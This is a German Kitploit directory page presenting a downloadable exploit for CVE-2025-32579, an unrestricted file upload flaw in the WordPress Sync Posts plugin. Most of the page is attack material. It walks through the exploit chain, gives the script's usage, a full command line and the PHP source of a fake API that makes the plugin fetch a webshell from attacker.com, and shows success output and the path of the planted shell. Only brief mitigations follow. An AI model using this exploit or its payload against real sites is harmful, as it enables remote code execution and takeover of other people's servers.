Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32579 — WordPress Sync Posts Plugin <= 1.0 ist anfällig für das Hochladen beliebiger Dateien | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-32579
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2025-32579

CVE-2025-32579

WordPress Sync Posts Plugin <= 1.0 ist anfällig für das Hochladen beliebiger Dateien

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

⚠️ CVE-2025-32579 - Kritischer RCE via Sync Posts Plugin (WordPress)

📦 Betrifft: Sync Posts <= 1.0
🧨 CVSS-Score: 9.9 KRITISCH
📁 CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 Verwundbarkeitsübersicht

Das Sync Posts WordPress-Plugin von SoftClever Limited ist anfällig für eine Unrestricted File Upload-Schwachstelle, die es authentifizierten Angreifern ermöglicht, beliebige PHP-Dateien (wie Webshells) auf dem Server hochzuladen und auszuführen.

🔓 Grundursache:

  • Das Plugin akzeptiert eine website_url, die JSON-Beiträge zurückgibt.
  • Es holt blind Bilder aus den Beitragsinhalten ohne Validierung.
  • Es werden keine Einschränkungen für Dateityp, MIME-Typ oder Pfad angewendet.
  • Alle Bilder (sogar PHP-Dateien) werden heruntergeladen und in wp-content/uploads gespeichert.

🚨 Warum es gefährlich ist

  • ✅ Remote Code Execution (RCE)
  • ✅ Lädt Webshells direkt auf den Server hoch
  • ✅ Erfordert minimale Berechtigungen (nur authentifizierter Benutzer)

⚙️ Skriptbeschreibung (Exploit)

Das Exploit-Skript automatisiert die gesamte Kette:

  1. 📥 Meldet sich bei WordPress mit den angegebenen Anmeldeinformationen an
  2. 🧠 Generiert eine gefälschte API-PHP, die einen JSON-Beitrag mit einer Shell als <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/..."> zurückgibt
  3. 📡 Sendet bösartige website_url an admin-ajax.php?action=sync_posts
  4. 💣 Zwingt das Plugin, die Shell in /uploads/ abzurufen und zu speichern
  5. ✅ Kein Referer oder Nonce erforderlich – Sitzungs-Cookie reicht aus

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 Nutzungshinweise

📌 Befehlsformat:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ Argumente:

Sie können auch ein Dummy-Bild anstelle einer echten Shell zum Testen verwenden:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 Beispiel für eine gefälschte API-Ausgabe

Dies ist die Antwort, die von Khaled_alenazi.php zurückgegeben wird:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ Erfolgreicher Exploit:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 Nach erfolgreicher Ausnutzung:

  • Shell-Pfad und -Name: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ Behebung / Gegenmaßnahmen

  • Beschränken Sie den Zugriff auf website_url auf interne Domänen oder Whitelist-Hosts
  • Validieren Sie Bilddateierweiterungen und Inhaltstypen
  • Vermeiden Sie das Parsen von JSON Dritter ohne Bereinigung

🧷 Referenz

CVE: CVE-2025-32579
Exploit von Nxploited (Khaled Alenazi)


Tool herunterladen
FlagBeschreibung
-u, --urlZiel-WordPress-URL
-un, --usernameWordPress-Benutzername (admin)
-p, --passwordWordPress-Passwort
-ws, --websiteURL zur bösartigen PHP-Datei, die gefälschten Beitrags-JSON zurückgibt
-shell, --webshellDie eigentliche Shell-Datei, die über `` injiziert wird